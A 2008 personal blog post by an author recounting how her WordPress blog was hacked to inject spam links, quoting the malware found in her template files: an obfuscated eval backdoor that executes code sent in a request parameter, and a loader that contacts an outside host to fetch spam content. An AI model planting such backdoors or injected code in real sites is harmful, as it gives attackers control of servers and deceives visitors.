The Fortune Cookie Chronicles

  • #26 on the New York Times Best Seller List
    and featured on The Colbert Report, Martha Stewart, TED.com, CNN, The Today Show, Good Morning America, Charlie Rose Tomorrow, Newsweek, Entertainment Weekly, and NPR stations coast to coast. Also selected for Borders Original Voices and Book Sense. Follow me on Twitter! Fan me on Facebook.

    • « | Home | »

    I was hacked (with WordPress footer Spam) but now am saved

    By Jennifer 8. Lee | August 23, 2008

    In poking around my blog because of layout issues, we discovered I had a bunch of spam links in my footer. Like a hundred links to latech.edu, with horrible things like cialis and viagra. About a month ago, I started noticing some very strange search queries bringing people to my site, like “pantyhose” and things I can’t write here (sexual acts, anatomy, and fluids and stuff) to my blog. I was perplexed. I didn’t use these terms. What was going on.

    So today, it all became clear. Turned out I had been hacked, perhaps it had to do with some WordPress vulerability.  I felt really violated.

    Anyway, in my templates. I went and looked in my header.php file on WordPress I was horrified to find something that started with this

    <?php eval(base64_decode(“aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQ…

    Which is a “code” for normal text. Decoded it became this:

    if(@$_REQUEST[“A”] == “b” and isset($_REQUEST[“C”])) eval(stripslashes(stripslashes($_REQUEST[“C”])));

    Which totally was sketchy. I also found anther one, which I couldn’t decompress by myself

    <?eval(gzuncompress(base64_decode(‘eJx1kMFqwzAMhl/FE2bEEJz0NmZCF6hp…

    That came to this:

    $path=”/blog”;@$s = fsockopen (“pub.supercyborg.info“,80);fputs($s,
    “GET /c/check.php?ua=”.urlencode($_

    SERVER[“HTTP_USER_AGENT”]).”&ra=”.urlencode($_SERVER[“REMOTE_ADDR”]).”&sn=”.urlencode($_SERVER[“SERVER_NAME”]).”&path=”.urlencode($path).”
    HTTP/1.0\\nHost: pub.supercyborg.info\\n\\n”);while(!feof($s))
    $o.=fgets($s,1000);$o=split(“\\r?\\n\\r?\\n”,$o);echo
    $o[1];fclose($s);’

    I removed these and the spam was still there! And also, I switched out theme, and it was still there. So it had to be in the WordPress files.

    And we had just done a WordPress upgrade so all of the files had been recently updated — so we couldn’t look at timestamps to figure out which files had been touched. But you could do a search for the base64 phrase. It turned out that some of the WordPress files themselves had been infected, like wp-functions.php And then another one of my files template-functions-comments.php was the one with all the bad things in it.

    (blah). But luckily I have adorable high-quality tech help which purged it for me. I’m eternally grateful!

    Topics: Blogging Musings, Chinese Food | No Comments »

    Comments are closed.